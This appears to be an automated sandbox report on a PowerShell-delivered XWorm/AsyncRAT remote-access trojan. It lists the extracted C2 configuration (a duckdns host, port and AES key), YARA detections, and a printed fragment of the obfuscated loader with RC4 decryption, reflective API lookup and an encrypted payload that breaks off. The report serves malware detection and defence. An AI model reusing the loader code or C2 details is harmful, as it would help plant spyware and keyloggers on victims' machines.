Click to jump to signature section
| Source: nmds.duckdns.org | Avira URL Cloud: Label: malware |
| Source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"} |
| Source: nmds.duckdns.org | Virustotal: Detection: 7% | Perma Link |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack | String decryptor: nmds.duckdns.org |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack | String decryptor: 8895 |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack | String decryptor: <123456789> |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack | String decryptor: <Xwormmm> |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack | String decryptor: USB.exe |
| Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2242458506.000001E70D7B0000.00000004.00000020.00020000.00000000.sdmp |
| Source: Malware configuration extractor | URLs: nmds.duckdns.org |
| Source: powershell.exe, 00000000.00000002.2243058884.000001E70F671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
| Source: powershell.exe, 00000000.00000002.2243058884.000001E70F671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
| Source: time.ps1 | String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout |
| Source: 15.2.notepad.exe.29b03a70000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 15.2.notepad.exe.29b03c1ce78.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
| Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
| Source: 0000000F.00000002.2180904890.0000029B03A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
| Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
| Source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001E70F29E55B | 0_2_000001E70F29E55B |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001E70F29E123 | 0_2_000001E70F29E123 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001E70F29E9E3 | 0_2_000001E70F29E9E3 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_000001E70F29D0DB | 0_2_000001E70F29D0DB |
| Source: C:\Windows\System32\notepad.exe | Code function: 15_2_0000029B01FAAF23 | 15_2_0000029B01FAAF23 |
| Source: C:\Windows\System32\notepad.exe | Code function: 15_2_0000029B01FAAB03 | 15_2_0000029B01FAAB03 |
| Source: C:\Windows\System32\notepad.exe | Code function: 15_2_0000029B01FAB7E3 | 15_2_0000029B01FAB7E3 |
| Source: C:\Windows\System32\notepad.exe | Code function: 15_2_0000029B01FA9EDB | 15_2_0000029B01FA9EDB |
| Source: C:\Windows\System32\notepad.exe | Code function: 15_2_0000029B01FAB35B | 15_2_0000029B01FAB35B |
| Source: 15.2.notepad.exe.29b03a70000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 15.2.notepad.exe.29b03c1ce78.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
| Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
| Source: 0000000F.00000002.2180904890.0000029B03A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
| Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
| Source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock' |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
| Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
| Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
| Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | Jump to behavior |
| Source: C:\Windows\System32\notepad.exe | Mutant created: NULL |
| Source: C:\Windows\System32\notepad.exe | Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD |
| Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03 |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewy3psod.ekd.ps1 | Jump to behavior |
| Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('kqW+3JCPYSaCQTLm3QJRR36Xx3pGCsiFoyxEVes8XoWqICI/LqAop7K1Bw7nt2mbTMn0uJPUqvUrO7Cl+wt2zDWqOIS6uWyfCvMDfejyx66g4WjLkNezNFeeRZnrw9AHrfPba2XFiewBeiRccMNXLfdc/2mTzA5/rUGoNRLACJZ7vhyJa7RCNmEineVXr9qAhzz7UuCaGsRvrdnzG++ |
Edit tour
powershell.exe (PID: 6120 cmdline: 
conhost.exe (PID: 4456 cmdline: 
notepad.exe (PID: 6828 cmdline: 
